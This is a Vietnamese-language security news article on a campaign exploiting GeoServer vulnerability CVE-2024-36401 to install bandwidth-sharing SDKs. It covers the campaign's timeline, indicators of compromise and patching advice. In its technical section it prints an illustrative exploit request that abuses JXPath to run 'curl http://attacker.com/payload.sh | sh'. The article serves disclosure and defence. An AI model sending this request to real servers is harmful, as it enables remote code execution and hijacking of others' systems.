Các nhà nghiên cứu an ninh mạng đã phát hiện một chiến dịch đang diễn ra, trong đó các tác nhân đe dọa khai thác lỗ hổng CVE-2024-36401 nghiêm trọng trong GeoServer, một cơ sở dữ liệu không gian địa lý, để thực thi mã từ xa và kiếm tiền từ băng thông của nạn nhân.

Chi tiết về Lỗ hổng và Khai thác GeoServer

Mô tả Kỹ thuật của Lỗ hổng

Lỗ hổng thực thi mã từ xa này được đánh giá với điểm CVSS là 9.8 (nghiêm trọng), cho thấy mức độ rủi ro cực kỳ cao. Nó cho phép những kẻ tấn công triển khai các bộ công cụ phát triển phần mềm (SDK) hợp pháp hoặc các ứng dụng đã bị sửa đổi trên hệ thống mục tiêu.

Mục tiêu của việc triển khai này là tạo ra thu nhập thụ động thông qua chia sẻ mạng hoặc hoạt động như các proxy dân cư, tận dụng tài nguyên của nạn nhân.

Phương thức Tấn công và Lợi dụng Băng thông

Cách tiếp cận này mô phỏng các chiến lược kiếm tiền lành tính được sử dụng bởi các nhà phát triển ứng dụng thông thường. Nó giúp tránh các quảng cáo truyền thống, từ đó duy trì trải nghiệm người dùng và tăng khả năng giữ chân ứng dụng trên thiết bị nạn nhân.

Những ứng dụng độc hại này hoạt động âm thầm trong nền, tiêu thụ tài nguyên hệ thống ở mức tối thiểu trong khi kiếm lợi nhuận từ băng thông không sử dụng. Điều đáng chú ý là chúng không phân phối các loại phần mềm độc hại công khai, làm cho việc phát hiện trở nên khó khăn hơn.

Sự tinh vi của cuộc tấn công thông qua lỗ hổng CVE-2024-36401 này nằm ở khả năng ngụy trang dưới dạng các dịch vụ hợp pháp, khó bị phát hiện bởi các giải pháp bảo mật thông thường.

Diễn biến và Cơ sở hạ tầng của Chiến dịch Khai thác

Giai đoạn Ban đầu và Mở rộng

Kể từ đầu tháng 3 năm 2025, những kẻ tấn công đã tiến hành quét các phiên bản GeoServer được phơi bày trên internet để tìm kiếm các mục tiêu tiềm năng. Cortex Xpanse đã xác định 3.706 máy chủ có thể truy cập công khai vào đầu tháng 5 năm 2025.

Dữ liệu này làm nổi bật một bề mặt tấn công rộng lớn, với phần lớn các máy chủ dễ bị tổn thương tập trung ở Trung Quốc và các khu vực khác.

Chiến dịch đã phát triển theo nhiều giai đoạn, bắt đầu bằng các khai thác ban đầu từ địa chỉ IP 108.251.152.209 vào ngày 8 tháng 3 năm 2025. Các khai thác này đã tải xuống các tệp thực thi tùy chỉnh từ máy chủ 37.187.74.75.

Theo báo cáo của Unit42, các tệp này bao gồm các biến thể của một ứng dụng bị lạm dụng (ví dụ: a193, d193, e193) và SDK (ví dụ: a593, c593). Báo cáo chi tiết của Unit42 cung cấp phân tích sâu hơn về hoạt động này.

Vào cuối tháng 3, chiến thuật đã thay đổi sau khi địa chỉ IP phân phối ban đầu bị gắn cờ là độc hại, dẫn đến việc dừng các mẫu ứng dụng mới và chuyển sang một IP mới là 185.246.84.189 vào ngày 1 tháng 4. Cơ sở hạ tầng tiếp tục mở rộng vào giữa tháng 4 với một máy chủ phân phối khác tại 64.226.112.52, duy trì sự hiện diện và hoạt động cho đến tháng 6 năm 2025.

IOCs (Indicators of Compromise)

Các chỉ số xâm nhập (IOCs) liên quan đến chiến dịch khai thác lỗ hổng CVE-2024-36401 bao gồm:

• Địa chỉ IP nguồn tấn công:
  • 108.251.152.209
• Địa chỉ IP máy chủ phân phối payload:
  • 37.187.74.75
  • 185.246.84.189
  • 64.226.112.52
• Các biến thể ứng dụng và SDK bị lạm dụng (ví dụ):
  • a193, d193, e193 (biến thể ứng dụng)
  • a593, c593, z593 (biến thể SDK)
• Tên script thứ cấp (ví dụ):
  • z401
  • z402

Phân tích Kỹ thuật Chuỗi Khai thác

Cơ chế Hoạt động của Lỗ hổng GeoServer

Khai thác này tận dụng các hàm mở rộng của JXPath trong GeoTools, cho phép chèn mã tùy ý thông qua các biểu thức như getRuntime().exec(). Đây là một cơ chế phổ biến để thực thi mã từ xa.

Điều này tạo điều kiện thuận lợi cho việc thực thi lệnh thông qua các yêu cầu như GetPropertyValue trong các dịch vụ WFS, WMS hoặc WPS của GeoServer. Khả năng này biến lỗ hổng CVE-2024-36401 thành một điểm yếu nghiêm trọng.

Ví dụ về một phần của yêu cầu HTTP độc hại có thể trông như sau:

GET /geoserver/wfs?request=GetPropertyValue&version=1.0.0&typeName=feature&valueReference=org.apache.commons.jxpath.JXPathContext.newContext(null).getFunctions().registerUserFunction('ns','func','java.lang.Runtime','exec')&queryExpression=ns:func('bash -c "curl http://attacker.com/payload.sh | sh"') HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0

Lưu ý: Đoạn mã trên chỉ là minh họa cho cơ chế khai thác và có thể khác với mã khai thác thực tế được sử dụng trong chiến dịch này. Nó cho thấy cách kẻ tấn công có thể sử dụng các hàm JXPath để thực thi lệnh hệ thống.

Kỹ thuật Che giấu và Triển khai Payload

Phân tích sâu cho thấy chuỗi khai thác bắt đầu với việc lợi dụng lỗ hổng CVE-2024-36401 để tải xuống payload giai đoạn hai, chẳng hạn như biến thể SDK z593. Payload này được tải từ các máy chủ do kẻ tấn công kiểm soát, thường sử dụng các máy chủ transfer.sh trên cổng 8080 để chuyển tải dữ liệu.

Payload trung gian này sau đó tải thêm các script (ví dụ: z401, z402). Các script này có nhiệm vụ tạo các thư mục ẩn trên hệ thống bị xâm nhập, thiết lập môi trường cần thiết và khởi chạy các tệp thực thi một cách bí mật để duy trì sự hiện diện và hoạt động.

Các tệp nhị phân được sử dụng, được xây dựng bằng Dart để tương thích đa nền tảng Linux, tích hợp các SDK hợp pháp để chia sẻ băng thông nhằm tạo thu nhập thụ động. Chúng tránh bị phát hiện bằng cách bắt chước các dịch vụ cấu hình thấp, thay vì các trình đào tiền mã hóa tiêu tốn nhiều tài nguyên và dễ bị phát hiện.

Việc so sánh xác nhận rằng các SDK này là các phiên bản chính thức không bị sửa đổi, điều này có khả năng giúp chúng vượt qua các biện pháp bảo vệ điểm cuối dựa trên chữ ký thông thường.

Tầm ảnh hưởng và Biện pháp Giảm thiểu

Thống kê và Phạm vi Tấn công

Dữ liệu đo lường từ tháng 3 đến tháng 4 năm 2025 cho thấy 7.126 phiên bản GeoServer đã bị phơi bày trên 99 quốc gia khác nhau. Trong đó, Trung Quốc là quốc gia có số lượng lớn nhất các máy chủ bị phơi nhiễm.

Thống kê này nhấn mạnh mức độ rộng lớn của mối đe dọa và tầm quan trọng của việc cập nhật bản vá kịp thời. Đây là một cảnh báo CVE nghiêm trọng cần được cộng đồng an ninh mạng và các quản trị viên hệ thống đặc biệt lưu tâm và hành động ngay lập tức.

Khuyến nghị Bảo mật và Bản vá

Để giảm thiểu rủi ro từ lỗ hổng CVE-2024-36401, các tổ chức nên cập nhật bản vá cho GeoServer một cách nhanh chóng. Việc áp dụng bản vá bảo mật mới nhất là biện pháp phòng ngừa quan trọng nhất chống lại nguy cơ bị chiếm quyền điều khiển từ xa thông qua lỗ hổng này.

Các công cụ của Palo Alto Networks như Advanced Threat Prevention (với chữ ký 95463), Advanced WildFire và Cortex XDR cung cấp khả năng phòng thủ mạnh mẽ chống lại các khai thác và payload liên quan đến chiến dịch này.

Việc chủ động theo dõi các bản cập nhật bảo mật và triển khai các giải pháp bảo mật toàn diện sẽ giúp bảo vệ hệ thống khỏi các mối đe dọa tương tự trong tương lai và duy trì an toàn thông tin.